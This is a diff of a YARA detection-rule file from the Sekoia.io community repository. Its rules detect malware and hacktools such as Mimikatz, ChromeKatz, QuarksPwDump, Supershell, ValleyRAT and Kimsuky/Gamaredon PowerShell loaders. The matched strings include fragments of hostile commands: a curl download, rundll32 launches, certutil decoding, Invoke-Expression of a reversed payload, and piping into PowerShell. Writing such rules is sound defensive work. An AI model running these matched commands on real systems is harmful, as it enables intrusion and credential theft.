 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "2600fc0a8fc6279936decf80256be1fc8cb581a59ef6646fe48b5885e104365e"
+		logic_hash = "f2b719170783c1bfaa4c4772e5cff73797be3056204566844c236d1857869e4c"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$funct1 = {22 00 87 18 70 20 f3 ae 40 00 6e 10 f4 ae 00 00 0c 04 1f 04 16 19 13 00 28 23 6e 20 e3 ae 04 00 12 10 6e 20 e5 ae 04 00 1a 00 25 19 6e 20 ea ae 04 00 28 05 0d 00 6e 10 ef ae 00 00 6e 10 da ae 04 00 6e 10 e1 ae 04 00 0a 00 13 01 c8 00 32 10 20 00 1c 00 ea 17 6e 10 73 ad 00 00 0c 00 22 01 60 18 70 10 5d ae 01 00 1a 02 ff 50 6e 20 69 ae 21 00 6e 10 e1 ae 04 00 0a 04 6e 20 64 ae 41 00 6e 10 72 ae 01 00 0c 04 71 20 1d 09 40 00}
-		$funct2 = {22 00 77 00 1a 01 88 56 70 20 f1 02 10 00 15 01 00 10 6e 20 f4 02 10 00 1a 01 80 8d 6e 20 32 ae 13 00 0a 01 38 01 0b 00 1a 01 25 76 71 10 b3 06 01 00 0c 01 6e 20 22 03 10 00 1a 01 56 61 6e 20 32 ae 13 00 0a 01 38 01 0b 00 1a 01 23 76 71 10 b3 06 01 00 0c 01 6e 20 22 03 10 00 1a 01 55 66 6e 20 32 ae 13 00 0a 03 38 03 0b 00 1a 03 24 76 71 10 b3 06 03 00 0c 03 6e 20 22 03 30 00 13 03 64 00 15 01 00 08 71 40 07 02 32 10 0c 03 11 03}
-		$s0 = "TokenResult{token="
-		$s1 = "[-] Send Resp Code ="
-		$s2 = "/report_token/report_token.php?token="
-		$s3 = "naver"
-		$s4 = "daum"
-		$s5 = "facebook"
+		$s1 = {65004e004500560045005200200047004f004e004e00410020004700490056004500200059004f0055002000550050002100}
 
 	condition:
-		uint32be( 0 ) == 0x6465780A and ( 1 of ( $funct* ) or all of ( $s* ) )
+		$s1 or pe.imphash ( ) == "b1e345b2d78e4b82617d995d18100790" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ac989507d4af352fa354560efef99ba6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "8090b29a44c750b7b21287f9639fe747" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ea8693d6bacf3e7876f717a3d8abc433" )
 }
-rule SEKOIA_Tool_Sy_Runas : FILE
+rule SEKOIA_Apt_Unk_Malicious_Lnk : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects a malicious LNK used by an APT"
 		author = "Sekoia.io"
-		id = "cb1f3707-6716-49b5-9fe0-45c5baf2e491"
-		date = "2023-08-23"
+		id = "d2248803-7ddf-4cde-ab6a-78b20e760919"
+		date = "2024-09-06"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_sy_runas.yar#L1-L20"
+		reference = "https://www.seqrite.com/blog/operation-oxidovy-sophisticated-malware-campaign-targets-czech-officials-using-nato-themed-decoys/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unk_malicious_lnk.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b606f921b0ff6adf0e6979d43be0ddf77e2967e703562f1dea4406d1f5b3f5fd"
+		hash = "a8d7e56eb01a8cf576533db9af2e92ec"
+		logic_hash = "993411ceba45d1212a4840e6a35b72b52e64e78cbb2599ebc5c70c2fd3b8e552"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238280,54 +238224,56 @@ rule SEKOIA_Tool_Sy_Runas : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "Sy_Runas.exe" ascii wide
-		$s2 = "password *.exe" ascii wide
-		$s3 = "This tools just work on webshell" ascii wide
-		$s4 = "Code By slls124@gmail.com" ascii wide
+		$ = ".pdf.lnkPK"
+		$ = ".jfifPK"
+		$ = ".batPK"
+		$ = ".pdfPK"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them
+		uint32be( 0 ) == 0x504b0304 and all of them
 }
-rule SEKOIA_Infostealer_Win_Whitesnake_Loader_Feb23 : FILE
+rule SEKOIA_Backdoor_Mul_Supershell_Client : FILE
 {
 	meta:
-		description = "Finds WhiteSnake samples (loader module, bat file)"
+		description = "Detect the Supershell client (unpacked) by looking for github references"
 		author = "Sekoia.io"
-		id = "f81a8a96-6fd2-4f5c-8a56-ff66ff1a80d3"
-		date = "2023-03-01"
+		id = "3498ca9e-a165-4dda-bc15-2e5d6d43d9c1"
+		date = "2024-04-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_whitesnake_loader_feb23.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_mul_supershell_client.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c9d4414fb17c28a3ea2e75837732e1657bdc7b2df4a7ab34e458d659441759e8"
+		logic_hash = "93490f4a16fb7dcde671b82e3187341abf4fc95e965219233ca7689f3cd3855f"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "a42906f8b392089fa1fe3ea264f6cb549ce5437b5ea253d9e1b8dd94bf115dad"
+		hash2 = "d97b41e8cd6b63cd55c9a4f99ccadf5a9141088319bc9eb467d96e54080f3c85"
+		hash3 = "2b54d1c064892a22f48b5742ba6da55bf62b73e5b1e0649e8b7880b286498735"
+		hash4 = "0dedab2ef8d44f9beef782a29dd8f628dd0218b90f23f729b315660437019ccd"
+		hash5 = "2484de7944889d784b8229f4fd756d3930e55c91654921019db4437877e30ab7"
 
 	strings:
-		$str01 = "echo         Please wait... a while Loading data ...." ascii
-		$str02 = "CERTUTIL -f -decode" ascii
-		$str03 = "%Temp%\\build.exe" ascii
-		$crt = "-----BEGIN CERTIFICATE-----" ascii
-		$mz = "TVqQAAMAAAAEAAAA" ascii
+		$ = "github.com/NHAS/reverse_ssh/internal/client/"
+		$ = "golang.org"
 
 	condition:
-		($str01 in ( 0 .. 200 ) or $str02 in ( 0 .. 200 ) or $str03 in ( 0 .. 200 ) ) and $mz in ( @crt .. @crt + 50 ) and filesize < 100KB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and all of them
 }
-rule SEKOIA_Apt_Unc3524_Quietexit_Strings : FILE
+rule SEKOIA_Hacktool_Mimikatz_Obfuscated : FILE
 {
 	meta:
-		description = "Detect the QUIETEXIT malware used by UNC3524"
+		description = "Detects Mimikatz on strings obfuscation"
 		author = "Sekoia.io"
-		id = "1bfa9baa-40a3-4ad7-83dc-f9340fbed180"
-		date = "2022-05-04"
+		id = "bac4bb61-d250-4fc3-95a5-edd4e3c7ff83"
+		date = "2022-07-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unc3524_quietexit_strings.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_mimikatz_obfuscated.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9f8bc7516fdefd94c6bddaf77ea3ac1ba8a3a6380530118c4b28d74b42eaae54"
+		logic_hash = "9f75e10122df0f57382e939d82b0ab4047d3d42f198c59faa22177d6d5d9afd7"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238335,29 +238281,32 @@ rule SEKOIA_Apt_Unc3524_Quietexit_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Child connection from %s:%s" ascii
-		$ = "Failed to run %s" ascii
-		$ = "add %s %s %s" ascii
-		$ = "/usr/bin/xauth -q" ascii
-		$ = "/tmp/dropbear-%" ascii
-		$ = "cron" ascii
-		$ = { DD E5 D5 97 20 53 27 BF F0 A2 BA CD 96 35 9A AD 1C 75 EB 47 }
+		$xor1 = "Benjamin Delpy" xor
+		$xor2 = "sekurlsa" xor wide
+		$xor3 = "minidumpfile.dmp" wide
+		$xor4 = "lsadump_dcsync" xor wide
+		$xor5 = "kuhl_m_lsadump_getSamKey" xor wide
+		$b1 = "Benjamin Delpy" base64
+		$b2 = "sekurlsa" base64 wide
+		$b3 = "minidumpfile.dmp" base64 wide
+		$b4 = "lsadump_dcsync" base64 wide
+		$b5 = "kuhl_m_lsadump_getSamKey" base64 wide
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize > 1MB and 5 of them
+		uint16be( 0 ) == 0x4d5a and 3 of them and filesize < 5MB
 }
-rule SEKOIA_Loader_Win_Gcleaner : FILE
+rule SEKOIA_Hacktool_Nbtscan_Strings : FILE
 {
 	meta:
-		description = "Detect the GCleaner loader using specific strings"
+		description = "Detects NBTScan hacktool based on strings, ELF & PE variants"
 		author = "Sekoia.io"
-		id = "0c085da3-ec77-4141-a927-bef1578a6dee"
-		date = "2022-10-11"
+		id = "8883b56c-a085-459c-9ec6-a139ad5a2671"
+		date = "2022-02-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_gcleaner.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_nbtscan_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f38aaab2911e4e901780bb6df2c58f02fa80d3e39fb56f60072285d0a929ba23"
+		logic_hash = "87e4f5dd16ee29dfd23b70dccbc41b0ef40c2db28f42fbd7fd84e5e93ca5c943"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238365,53 +238314,55 @@ rule SEKOIA_Loader_Win_Gcleaner : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "G-Cleaner can clean unneeded files, settings, and Registry entries" ascii
-		$str02 = "3.  Click \"Run G-Cleaner\"" ascii
-		$str03 = "Garbage_Cleaner" ascii
-		$str04 = "GCleaner.Properties" ascii
-		$str05 = "SOFTWARE\\GCleaner\\Install" wide
-		$str06 = "SOFTWARE\\GCleaner\\Trial" wide
-		$str07 = "SOFTWARE\\GCleaner\\License" wide
-		$str08 = "G-Cleaner activation" wide
+		$ = "CHT:nfp:bt:vw:mVO:1P"
+		$ = "usage: %s [options] target [targets...]"
+		$ = "Targets are lists of IP addresses, DNS names, or address"
+		$ = "net bits [%d] must be 1..32"
+		$ = "subnet /%d is too large (%d max)"
+		$ = "[%s] is invalid IP address"
+		$ = "[%s] is an invalid target (bad IP/hostname)"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 6 of them
+		uint16be( 0 ) == 0x4d5a and 5 of them
 }
-
-rule SEKOIA_Rat_Win_Romcom_Payload
+rule SEKOIA_Apt_Gamaredon_Doc_External_Template : FILE
 {
 	meta:
-		description = "Detect the RomCom malware"
+		description = "Detects malicious templates used by Gamaredon"
 		author = "Sekoia.io"
-		id = "c391f84c-f0cb-42d8-a8d8-d59725bf74c2"
-		date = "2022-11-04"
+		id = "5f6bbf92-2fdf-428d-af49-2d3e754c29d7"
+		date = "2023-01-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_romcom_payload.yar#L4-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_doc_external_template.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "56f016df8e9165522e18f34bdb7c3044ee8927f53dd6818fa2b3d6424191d8e0"
+		logic_hash = "51412081fa7e62fa342b0ed6da18009b39e3952286f2bd319fbe10e0b1761e02"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$ = "USERPROFILE" ascii
+		$ = "msxml2" ascii
+		$ = "T24gRXJyb3IgUmVzdW1lIE5leHQ" ascii
+
 	condition:
-		for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "160ed1cdf6e9321cef19cfed6a63b4b5557dd35e174b821bf8a81c4146fa6536" )
+		uint32be( 0 ) == 0xd0cf11e0 and filesize < 100KB and all of them
 }
-
-rule SEKOIA_Tool_Win_Blackfly_Proxy_Config : FILE
+rule SEKOIA_Hacktool_Iox_Tunneling : FILE
 {
 	meta:
-		description = "Detect Blackfly proxy configuration tool"
+		description = "Detects IOX tunneling tool"
 		author = "Sekoia.io"
-		id = "c8a8be5d-bd28-4306-9466-ad582e53fede"
-		date = "2023-02-28"
+		id = "45b31d67-95e9-405d-88ea-3f2006ef160a"
+		date = "2022-10-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_win_blackfly_proxy_config.yar#L4-L29"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_iox_tunneling.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a421d933209f3a81f7430f1b933074701a1fc965c1b4bc321cc7b4e89802f483"
+		logic_hash = "e15df032864799e282ee89402d22b82e5d4b8f469ec292575a1bcb78d24db012"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238419,25 +238370,30 @@ rule SEKOIA_Tool_Win_Blackfly_Proxy_Config : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "c:\\ProgramData\\l.dat"
-		$ = "C:\\ProgramData\\b.dat"
-		$ = "winmm_DotNetfile.dll"
+		$ = "iox/operate.Local2Remote"
+		$ = "iox/operate.Local2Local"
+		$ = "iox/operate.Remote2Remote"
+		$ = "iox/operate.ProxyLocal"
+		$ = "iox/operate.ProxyRemote"
+		$ = "iox/operate.ProxyRemoteL2L"
 
 	condition:
-		pe.imphash( ) == "ff47f65286cc51a1328bc94efbf4007f" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f5923d4331f7e84fbbbd6fd84b6d3e6a" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "56acc10233c711a4eba9ca9aeab47e30" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "824dcebe93ac83bf5c95c781a60b3578" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ec716a08b5e647f5c00c5dfc079dfa62" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5cb63f7392c9e05c22e89cd86bd7f718" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ee04e245066e25edd3062d823f15deda" ) or ( uint16( 0 ) == 0x5A4D and 1 of them )
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 5MB and all of them
 }
-rule SEKOIA_Malware_Sugargh0St_Strings : FILE
+rule SEKOIA_Tinyfluff_Nodejs : FILE
 {
 	meta:
-		description = "Detects SugarGh0st based on strings"
+		description = "Detect TinyFluff backdoor by OldGremlin"
 		author = "Sekoia.io"
-		id = "51930498-b04a-4f13-8d14-ee975a28126e"
-		date = "2023-12-01"
+		id = "ca8cbd90-f275-4442-8354-b8b069e2efc3"
+		date = "2022-04-20"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_sugargh0st_strings.yar#L1-L20"
+		reference = "https://blog.group-ib.com/oldgremlin_comeback"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tinyfluff_nodejs.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b878b5d3b3f62952d79c0ea5811838f4e79302b85f25494e91dc730dec8e1d8d"
+		hash = "bd0a6a3628f268a37ac9d708d03f57feef5ed55e"
+		hash = "bd0a6a3628f268a37ac9d708d03f57feef5ed55e"
+		logic_hash = "7fa07b6ea32b914887bdcada0f9fda086bc29a44bfdf27e7433ef589192f4b82"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238445,32 +238401,24 @@ rule SEKOIA_Malware_Sugargh0St_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "%sd.%s /c \"%s\"" wide
-		$ = "[Num Lock]" wide
-		$ = "#32770" wide
-		$ = "]%s (%4d-%02d-%02d %02d:%02d:%02d)" wide
+		$s1 = "TinyFluff.pdb" fullword ascii
+		$s2 = "node.exe" fullword wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 100KB and all of them
+		filesize < 500KB and uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Malware_Valleyrat_Strings_Config : FILE
+rule SEKOIA_Apt_Gamaredon_Subtle_Paws : FILE
 {
 	meta:
-		description = "ValleyRAT strings based on HIVE KEYS and config. "
+		description = "SUBTLE-PAWS powershell backdoor used by Gamaredon"
 		author = "Sekoia.io"
-		id = "bb186ab7-60cd-487e-8b9c-c2ff8f121454"
-		date = "2024-08-19"
+		id = "1950f886-97d2-4aa1-8f13-2947eba706e4"
+		date = "2024-02-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_valleyrat_strings_config.yar#L1-L27"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_subtle_paws.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "b1887a48e59ac7b1b1742854d2a228af"
-		hash = "f6c69e83ce61aacacfbc410345008268"
-		hash = "63ad42e03aca6ce447fb447e21aeb385"
-		hash = "e1d41e5fdfebf8062911ef3c3853b807"
-		hash = "e6cafb4136a9438227086a5826eafe10"
-		hash = "54ba4bbeacd1521164a40e92262b15f6"
-		logic_hash = "89a3d3ca32f9c57e932686f0ed03821350770f82e598948ed86414e231e27a30"
+		logic_hash = "2fcebcf3401912e06ca4a34bf4e8d5318c6b2e08b00c4939ab932f3fb94cbc89"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238478,87 +238426,95 @@ rule SEKOIA_Malware_Valleyrat_Strings_Config : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$key1 = "IpDateInfo" ascii fullword
-		$key2 = "IpDate" ascii fullword
-		$key3 = "SelfPath" ascii fullword
-		$config1 = {7c 00 69 00 3a 00 }
-		$config2 = {7c 00 70 00 3a 00 }
+		$s1 = "$splitter" ascii wide
+		$s2 = "[System.Convert]::FromBase64String" ascii wide
+		$s3 = "$_;$var2 =\"var1\";$var3" ascii wide
+		$s4 = "foreach-object{$_|powershell -noprofile -}" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 1 of ( $key* ) and $config2 in ( @config1 .. @config1 + 100 ) and filesize > 300KB and filesize < 100MB
+		$s1 and $s2 and ( $s3 or $s4 ) and filesize < 100KB
 }
-rule SEKOIA_Apt_Apt41_Powershell_Exfiltration_Script : FILE
+rule SEKOIA_Hacktool_Credentialkatz : FILE
 {
 	meta:
-		description = "Detects PowerShell exfiltration script"
+		description = "Finds ChromeKatz (CredentialKatz version) standalone samples based on the strings"
 		author = "Sekoia.io"
-		id = "9a15f845-c0af-4f1c-a033-b4f40232dc0d"
-		date = "2023-11-15"
+		id = "4795d131-2625-40ca-bca6-02aac5030b55"
+		date = "2024-10-30"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt41_powershell_exfiltration_script.yar#L1-L18"
+		reference = "https://github.com/Meckazin/ChromeKatz"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_credentialkatz.yar#L1-L34"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0ba4118855d6bd54cbb3a35e3b5fc36484eeb1e742ed3480e6c967b078ec4881"
+		hash = "2762e066128e186526c5ff272fc9184c0262d81d8c513e6515c25c189418931c"
+		logic_hash = "dbfc0a6e8ad6701a071cb76564a2aeb9924ff7f13306f5dca1e1045c51f07ae7"
 		score = 75
-		quality = 72
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$UPLOAD_PASSPORT" ascii wide nocase
-		$ = "$fileName=$singleFile.Name" ascii wide nocase
-		$ = "Upload-Passport" ascii wide nocase
-		$ = "$singleFile in $files" ascii wide nocase
+		$str01 = "Don't use your cat's name as a password!" ascii
+		$str02 = "[-] Failed to parse command line argument /pid!" ascii
+		$str03 = "[*] Targeting process: %ls on PID: %lu" ascii
+		$str04 = "CredentialStore: NotSet" ascii
+		$str05 = "CredentialStore: AccountStore" ascii
+		$str06 = "CredentialStore: ProfileStore" ascii
+		$str07 = "[*] Number of available credentials: %zu" ascii
+		$str08 = "[+] Found browser process: %d" ascii
+		$str09 = "Failed to read credential struct" wide
+		$str10 = "Error reading right node" wide
+		$str11 = "Failed to read the root node from given address" wide
+		$str12 = "Error reading first node" wide
+		$str13 = "chrome.dll" wide
+		$str14 = "    Domain:" ascii
+		$str15 = "    Password:" ascii
+		$str16 = "Found %ls main process PID: %lu" ascii
+		$str17 = "---------------" ascii
+		$str18 = "CredentialKatz" ascii wide
 
 	condition:
-		filesize < 10KB and all of them
+		uint16( 0 ) == 0x5A4D and 5 of them
 }
-rule SEKOIA_Downloader_Win_Curl_Agent
+rule SEKOIA_Apt_Andariel_Dorarat_Strings : FILE
 {
 	meta:
-		description = "Detect the downloader used by Bluenoroff to install it CurlAgent"
+		description = "Detects Dora RAT based on strings"
 		author = "Sekoia.io"
-		id = "ddeb2d8f-1b10-4a33-b768-d19412e8551a"
-		date = "2023-05-02"
+		id = "30388291-a287-489f-a060-c90a16cda217"
+		date = "2024-06-17"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_win_curl_agent.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_andariel_dorarat_strings.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b34375ec051c969adec82901c1130b0a389261912559d70c652ee826cb2d4107"
+		logic_hash = "21e1c77d486cbf6ddaa2eca673275c7c21cc59fa9551c2eb02c526518ed5b217"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "%s\\marcoor.dll" wide
-		$ = "curl -A cur1-agent -L %s -s -d dl"
-		$ = "curl -A cur1-agent -L %s -s -d da"
-		$ = "cmd /c timeout /t 10 & rundll32 \"%s\" #1" wide
-		$ = "cmd /c timeout /t 10 & Del /f /q \"%s\" & attrib -s -h \"%s\" & rundll32 \"%s\" #1" wide
+		$x1 = "/encryption.go" ascii fullword
+		$x2 = "/handshake.go" ascii fullword
+		$x3 = "/trans_module.go" ascii fullword
+		$enc_rsc = { 14 02 72 14 D3 4C 4A 49 55 36 14 DF 8D 6F 2D CF }
 
 	condition:
-		3 of them
+		uint16be( 0 ) == 0x4d5a and ( all of ( $x* ) or $enc_rsc )
 }
-rule SEKOIA_Apt_Kimsuky_Powershell : FILE
+rule SEKOIA_Tool_Quarkspwdump : FILE
 {
 	meta:
-		description = "Powershell scripts used by Kimsuky. If size < 3KB ok. If between 3 and 15, a check is needed"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "b7f812e0-d08b-40fe-908a-dc5765d6bc66"
-		date = "2024-09-23"
+		id = "859823f9-6d47-4b0f-844b-d3af7bad498b"
+		date = "2023-06-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_powershell.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_quarkspwdump.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "6babb53d881448dc58dd7c32fcd4208a"
-		hash = "29ec7a4495ea512d44d33c9847893200"
-		hash = "fde68771cebd7ecd81721b0dff5b7869"
-		hash = "0c3fd7f45688d5ddb9f0107877ce2fbd"
-		hash = "1a1723be720c1d9cd57cf4a6a112df79"
-		logic_hash = "7436d8cba8a8caaf95786c38c4ceee4426dc7e36ae3eeed5d3162310cd76091d"
+		logic_hash = "4799e1d1c749a536d7920e3c333d69f7130376c6a0f0e0ca8f0b61e438266adb"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238566,89 +238522,96 @@ rule SEKOIA_Apt_Kimsuky_Powershell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ".ToCharArray();[array]::Reverse(" ascii
-		$ = ");$res = -join ($bytes -as [char[]]);Invoke-Expression $res;" ascii
+		$s1 = "quarks-pwdump.exe"
+		$s2 = "--------------------------------------------- BEGIN DUMP --------------------------------------------"
+		$s3 = "%s_hist%d:\"\":\"\":%s:%s"
 
 	condition:
-		all of them and filesize < 15KB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Sugargh0Stcampaign_Malicious_Lnk : FILE
+rule SEKOIA_Apt_Darkpink_Kamikakabot_Strings
 {
 	meta:
-		description = "Detects malicious LNK used in SugarGh0st campaign"
+		description = "Detects KamiKakaBot strings (.NET sample of Dark Pink)"
 		author = "Sekoia.io"
-		id = "4297c150-d125-49b9-8850-fcedf5284ae9"
-		date = "2023-12-01"
+		id = "0f5a7d72-81c8-4fdd-aefd-136bc6d48aa5"
+		date = "2023-02-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sugargh0stcampaign_malicious_lnk.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_darkpink_kamikakabot_strings.yar#L1-L30"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9efa131fdb02f31812c8a3f2053e1b60d0970c748eb0f82aed92a1c0719e048c"
+		logic_hash = "0bc37c96b591d8edb1fd288ef874b3cc31879ce166b8734a3dd0e29644cbea55"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "dir /S/b *.lnk " wide
-		$ = "%temp%\\*.lnk" wide
+		$ = "Execute"
+		$ = "f4869"
+		$ = "getIndentifyName"
+		$ = "getMessageAsync"
+		$ = "requestMessageID"
